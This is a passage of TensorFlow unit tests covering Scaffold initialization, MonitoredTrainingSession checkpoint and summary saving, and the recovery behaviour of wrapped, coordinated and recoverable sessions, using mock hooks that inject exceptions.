self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertEqual(None, scaffold.local_init_feed_dict)
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
with self.cached_session() as sess:
self.assertItemsEqual([b'my_var', b'my_local_var'],
sess.run(scaffold.ready_op))
self.assertItemsEqual([b'my_var'],
sess.run(scaffold.ready_for_local_init_op))
sess.run(scaffold.init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_for_local_init_op)))
sess.run(scaffold.local_init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_op)))
def test_defaults_no_variables(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
constant_op.constant(1, name='my_const')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertEqual(None, scaffold.local_init_feed_dict)
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
def test_caches_values(self):
with ops.Graph().as_default():
variables.VariableV1([1])
scaffold1 = monitored_session.Scaffold()
scaffold1.finalize()
scaffold2 = monitored_session.Scaffold()
scaffold2.finalize()
self.assertEqual(scaffold1.init_op, scaffold2.init_op)
self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
self.assertEqual(scaffold1.ready_for_local_init_op,
scaffold2.ready_for_local_init_op)
self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
self.assertEqual(scaffold1.saver, scaffold2.saver)
def test_raise_error_if_more_than_one_cached_item(self):
with ops.Graph().as_default():
variables.VariableV1([1])
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
with self.assertRaisesRegexp(RuntimeError, 'More than one item'):
monitored_session.Scaffold().finalize()
def test_uses_passed_values(self):
with ops.Graph().as_default():
variables.VariableV1([1])
saver = saver_lib.Saver()
scaffold = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
local_init_feed_dict=8,
saver=saver)
scaffold.finalize()
self.assertEqual(2, scaffold.init_op)
self.assertEqual(3, scaffold.init_feed_dict)
self.assertTrue(callable(scaffold.init_fn))
self.assertEqual(5, scaffold.ready_op)
self.assertEqual(6, scaffold.ready_for_local_init_op)
self.assertEqual(7, scaffold.local_init_op)
self.assertEqual(8, scaffold.local_init_feed_dict)
self.assertEqual(saver, scaffold.saver)
def test_graph_is_finalized(self):
with ops.Graph().as_default():
variables.VariableV1([1])
monitored_session.Scaffold().finalize()
with self.assertRaisesRegexp(RuntimeError,
'Graph is finalized and cannot be modified'):
constant_op.constant([0])
def test_new_scaffold_from_default_scaffold(self):
scaffold1 = monitored_session.Scaffold()
with ops.Graph().as_default():
variables.VariableV1([1])
saver = saver_lib.Saver()
scaffold2 = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
local_init_feed_dict=8,
saver=saver,
copy_from_scaffold=scaffold1)
scaffold2.finalize()
self.assertEqual(2, scaffold2.init_op)
self.assertEqual(3, scaffold2.init_feed_dict)
self.assertTrue(callable(scaffold2.init_fn))
self.assertEqual(5, scaffold2.ready_op)
self.assertEqual(6, scaffold2.ready_for_local_init_op)
self.assertEqual(7, scaffold2.local_init_op)
self.assertEqual(8, scaffold2.local_init_feed_dict)
self.assertEqual(saver, scaffold2.saver)
def test_new_scaffold_from_existing_scaffold(self):
with ops.Graph().as_default():
variables.VariableV1([1])
saver = saver_lib.Saver()
scaffold1 = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
local_init_feed_dict=8,
saver=saver)
scaffold2 = monitored_session.Scaffold(
init_op=4,
init_feed_dict=6,
init_fn=lambda scaffold, sess: 8,
ready_op=10,
ready_for_local_init_op=12,
local_init_op=14,
local_init_feed_dict=15,
saver=saver,
copy_from_scaffold=scaffold1)
scaffold2.finalize()
self.assertEqual(4, scaffold2.init_op)
self.assertEqual(6, scaffold2.init_feed_dict)
self.assertTrue(callable(scaffold2.init_fn))
self.assertEqual(10, scaffold2.ready_op)
self.assertEqual(12, scaffold2.ready_for_local_init_op)
self.assertEqual(14, scaffold2.local_init_op)
self.assertEqual(15, scaffold2.local_init_feed_dict)
self.assertEqual(saver, scaffold2.saver)
def test_copy_from_scaffold_is_scaffold(self):
with ops.Graph().as_default():
with self.assertRaisesRegexp(
TypeError, 'copy_from_scaffold is not a Scaffold instance'):
monitored_session.Scaffold(copy_from_scaffold=1)
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(session_run_hook.SessionRunHook):
def __init__(self):
self.should_stop = False
self.request = None
self.call_counter = collections.Counter()
self.last_run_context = None
self.last_run_values = None
def begin(self):
self.call_counter['begin'] += 1
def after_create_session(self, session, coord): # pylint: disable=unused-argument
self.call_counter['after_create_session'] += 1
def before_run(self, run_context):
self.call_counter['before_run'] += 1
self.last_run_context = run_context
return self.request
def after_run(self, run_context, run_values):
self.call_counter['after_run'] += 1
self.last_run_values = run_values
if self.should_stop:
run_context.request_stop()
def end(self, session):
self.call_counter['end'] += 1
class MonitoredTrainingSessionTest(test.TestCase):
"""Tests MonitoredTrainingSession."""
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(2, session.run(gstep))
def test_save_checkpoint_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_steps')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(100, session.run(gstep))
def test_save_checkpoint_secs(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_secs')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_secs=0.1,
log_step_count_steps=10) as session:
session.run(new_gstep)
time.sleep(0.2)
for _ in range(10):
session.run(new_gstep)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(11, session.run(gstep))
def test_summaries_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_steps')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
summaries = latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_summaries_secs(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_secs')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_summaries_steps=None,
save_summaries_secs=0.1,
log_step_count_steps=10) as session:
session.run(new_gstep)
time.sleep(0.2)
for _ in range(101):
session.run(new_gstep)
summaries = latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_custom_saving(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
fake_hook = FakeHook()
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
chief_only_hooks=[fake_hook],
save_checkpoint_secs=0) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# Check whether custom hook called or not
self.assertEqual(1, fake_hook.call_counter['begin'])
# A restart will not find the checkpoint, since we didn't save.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
def test_save_graph_def(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_graph_def')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_steps=1,
save_graph_def=True) as session:
self.assertIn('graph.pbtxt', os.listdir(logdir))
self.assertLen(glob.glob(os.path.join(logdir, '*.meta')), 1)
session.run(new_gstep)
self.assertLen(glob.glob(os.path.join(logdir, '*.meta')), 2)
def test_save_graph_def_false(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_graph_def')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_steps=1,
save_graph_def=False) as session:
self.assertNotIn('graph.pbtxt', os.listdir(logdir))
self.assertEmpty(glob.glob(os.path.join(logdir, '*.meta')))
session.run(new_gstep)
self.assertEmpty(glob.glob(os.path.join(logdir, '*.meta')))
class MockExtended(object):
def __init__(self, between_graph, should_init, should_checkpoint,
should_save_summary):
self.experimental_between_graph = between_graph
self.experimental_should_init = should_init
self.should_checkpoint = should_checkpoint
self.should_save_summary = should_save_summary
class MockStrategy(object):
def __init__(self,
between_graph=False,
should_init=True,
should_checkpoint=None,
should_save_summary=None):
self.extended = MockExtended(between_graph, should_init, should_checkpoint,
should_save_summary)
class MonitoredTrainingSessionWithDistributeCoordinatorTest(test.TestCase):
"""Test distribute coordinator controls summary saving and checkpointing."""
def test_summary_hook_enabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_save_summary=True), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_enabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
summaries = latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_summary_hook_disabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_save_summary=False), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_disabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
# No summary is saved.
summaries = latest_summaries(logdir)
self.assertEqual(len(summaries), 0)
def test_checkpoint_hook_enabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_checkpoint=True), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_enabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(100, session.run(gstep))
def test_checkpoint_hook_disabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_checkpoint=False), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_disabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# No checkpoint is saved.
checkpoint = checkpoint_management.latest_checkpoint(logdir)
self.assertIsNone(checkpoint)
def test_checkpoint_hook_enable_on_non_chief_with_collective_ops(self):
strategy = collective_all_reduce_strategy.CollectiveAllReduceStrategy()
strategy.extended._is_chief = False
context = distribute_coordinator._WorkerContext(strategy, None, 'worker', 1)
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_disabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# No checkpoint is saved.
checkpoint = checkpoint_management.latest_checkpoint(logdir)
self.assertIsNone(checkpoint)
# But saved to a temporary directory.
checkpoint = checkpoint_management.latest_checkpoint(
os.path.join(logdir, 'tmp_worker_1'))
self.assertIsNotNone(checkpoint)
class StopAtNSession(monitored_session._WrappedSession):
"""A wrapped session that stops at the N-th call to _check_stop."""
def __init__(self, sess, n):
super(StopAtNSession, self).__init__(sess)
self._count = n
def _check_stop(self):
if self._count == 0:
return True
self._count -= 1
return False
class WrappedSessionTest(test.TestCase):
"""_WrappedSession tests."""
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEquals(sess.graph, wrapped_sess.graph)
self.assertEquals(sess.sess_str, wrapped_sess.sess_str)
@test_util.run_deprecated_v1
def test_should_stop_on_close(self):
with self.cached_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertFalse(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
@test_util.run_deprecated_v1
def test_should_stop_uses_check_stop(self):
with self.cached_session() as sess:
wrapped_sess = StopAtNSession(sess, 3)
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertTrue(wrapped_sess.should_stop())
@test_util.run_deprecated_v1
def test_should_stop_delegates_to_wrapped_session(self):
with self.cached_session() as sess:
wrapped_sess0 = StopAtNSession(sess, 4)
wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertTrue(wrapped_sess1.should_stop())
@test_util.run_deprecated_v1
def test_close_twice(self):
with self.cached_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
while not coord.should_stop():
time.sleep(0.001)
class CoordinatedSessionTest(test.TestCase):
"""_CoordinatedSession tests."""
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEquals(sess.graph, coord_sess.graph)
self.assertEquals(sess.sess_str, coord_sess.sess_str)
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))
@test_util.run_deprecated_v1
def test_should_stop_on_close(self):
with self.cached_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord_sess.close()
self.assertTrue(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_should_stop_on_coord_stop(self):
with self.cached_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord.request_stop()
self.assertTrue(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_dont_request_stop_on_exception_in_main_thread(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
self.assertEqual(0, coord_sess.run(c))
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
self.assertFalse(coord.should_stop())
self.assertFalse(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_stop_threads_on_close_after_exception(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(0, coord_sess.run(c))
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
for t in threads:
self.assertTrue(t.is_alive())
with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
def test_stop_threads_on_close(self):
with self.cached_session() as sess:
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_propagates_exception_trace(self):
assertion = control_flow_ops.Assert(False, ['This should fail.'])
with self.cached_session() as sess:
coord = coordinator.Coordinator(clean_stop_exception_types=())
coord_sess = monitored_session._CoordinatedSession(sess, coord)
try:
coord_sess.run([assertion])
self.fail('No exception was raised by assertion.')
except errors_impl.InvalidArgumentError:
# Extract the name of the file where the exception was first raised.
_, _, exc_traceback = sys.exc_info()
tb = traceback.extract_tb(exc_traceback)
exc_source_file = tb[-1][0]
exc_source_basename = os.path.basename(exc_source_file)
# If it's monitored_session.py then the original stack trace was not
# correctly propagated.
self.assertIn(
exc_source_basename, ['session.py', 'monitored_session.py'],
'The exception was raised from an unrecognized file. This unit '
'test probably needs to be updated. Traceback:\n%s\n' % tb)
self.assertEqual(
exc_source_basename, 'session.py',
'Original stack trace was not propagated by MonitoredSession. '
'Traceback:\n%s' % tb)
class AbortAtNSession(object):
"""A mock session that aborts at the N-th run call."""
def __init__(self, sess, n):
self._sess = sess
self._count = n
def close(self):
pass
def run(self, *args, **kwargs):
if self._count == 0:
raise errors_impl.AbortedError('Aborted at N', None, None)
self._count -= 1
return self._sess.run(*args, **kwargs)
class StopCoordinatorWithException(session_run_hook.SessionRunHook):
"""With this hook Coordinator throws an exception after N-runs."""
def __init__(self, calls_before_stopping, exception_to_raise=None):
self._started_the_side_thread_already = False
self._lock = threading.Lock()
self._stored_exception_event = threading.Event()
self._calls_before_stopping = calls_before_stopping
self._exception_to_raise = (exception_to_raise or errors_impl.AbortedError(
None, None, 'Aborted at N'))
def _maybe_stop_with_exception(self, coord):
while True:
with self._lock:
if self._calls_before_stopping == 0:
try:
raise self._exception_to_raise
except Exception as e: # pylint: disable=broad-except
coord.request_stop(e)
self._stored_exception_event.set()
break
def after_create_session(self, session, coord):
if self._started_the_side_thread_already:
return
separate_thread = threading.Thread(
target=self._maybe_stop_with_exception, args=(coord,))
coord.register_thread(separate_thread)
separate_thread.start()
self._started_the_side_thread_already = True
# Coordinator will take care of joining `separate_thread`.
def after_run(self, run_context, run_values):
stopping_now = False
with self._lock:
self._calls_before_stopping -= 1
if self._calls_before_stopping == 0:
stopping_now = True
if stopping_now:
self._stored_exception_event.wait()
class FailTrainingAfterCoordinatorStopped(StopCoordinatorWithException):
"""With this hook training encounters an exception after N-runs."""
def __init__(self, calls_before_stopping):
StopCoordinatorWithException.__init__(self, calls_before_stopping)
self._coord = None
def after_create_session(self, session, coord):
self._coord = coord
return StopCoordinatorWithException.after_create_session(
self, session, coord)
def after_run(self, run_context, run_values):
StopCoordinatorWithException.after_run(self, run_context, run_values)
try:
# After a `run`, an exception could have been stored inside the
# coordinator.
self._coord.raise_requested_exception()
except errors_impl.AbortedError:
# In real world, the main thread may or may not know about the exception
# that stopped the coordinator. Because the coordinator has stopped, the
# main thread could have gotten stuck as well (for example, the
# coordinator was supposed to execute `FIFOQueue.enqueue` while the main
# thread is executing a blocking `FIFOQueue.dequeue`). After it got stuck,
# the session is going to get garbage collected after some time with:
raise errors_impl.CancelledError(None, None,
'Session got garbage-collected.')
class CountingSessionCreator(object):
"""A creator that counts the number of created sessions."""
def __init__(self, session):
self._initial_session = session
# We only have one session per test case. We can't re-create it, thus
# it shouldn't be closed.
self._initial_session.close = lambda *args: None
self._create_session_calls = 0
@property
def number_of_sessions_created(self):
return self._create_session_calls
def create_session(self):
self._create_session_calls += 1
return self._initial_session
class RecoverableSessionTest(test.TestCase):
"""_RecoverableSession tests."""
class _SessionReturner(object):
def __init__(self, sess):
self._sess = sess
def create_session(self):
return self._sess
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEquals(sess.graph, recoverable_sess.graph)
self.assertEquals(sess.sess_str, recoverable_sess.sess_str)
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
@test_util.run_deprecated_v1
def test_recovery(self):
with self.cached_session() as sess:
class StackSessionCreator(object):
def __init__(self, sess):
self.sessions_to_use = [
AbortAtNSession(sess, x + 1) for x in range(3)
]
def create_session(self):
return self.sessions_to_use.pop(0)
c = constant_op.constant(0)
v = array_ops.identity(c)
session_creator = StackSessionCreator(sess)
# List of 3 sessions to use for recovery. The first one aborts
# after 1 run() call, the second after 2 run calls, the third
# after 3 run calls.
self.assertEqual(3, len(session_creator.sessions_to_use))
# Make the recoverable session uses these 3 sessions in sequence by
# passing a factory that pops from the session_to_use list.
recoverable_sess = monitored_session._RecoverableSession(session_creator)
self.assertEqual(
2, len(session_creator.sessions_to_use)) # One session popped.
# Using first session.
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
self.assertEqual(
2, len(session_creator.sessions_to_use)) # Still 2 sessions available
# This will fail and recover by picking up the second session.
self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
# This will fail and recover by picking up the last session.
self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
self.assertEqual(
0, len(session_creator.sessions_to_use)) # All sessions used.
self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
# This will fail and throw a real error as the pop() will fail.
with self.assertRaisesRegexp(IndexError, 'pop from empty list'):
recoverable_sess.run(v, feed_dict={c: -12})
@test_util.run_deprecated_v1
def test_recovery_from_coordinator_exception(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[StopCoordinatorWithException(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
hook = StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.'))
session = monitored_session.MonitoredSession(session_creator, [hook])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[FailTrainingAfterCoordinatorStopped(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# Training will not fail, since it's the call number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# Training will fail during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# Even though the coordinator stopped which and training failed, the
# underlying session is recreated and training is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_step_fn_recovery_from_coordinator_exception_when_run_hooks(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[StopCoordinatorWithException(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator_when_run_hooks(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
hook = StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.'))
session = monitored_session.MonitoredSession(session_creator, [hook])
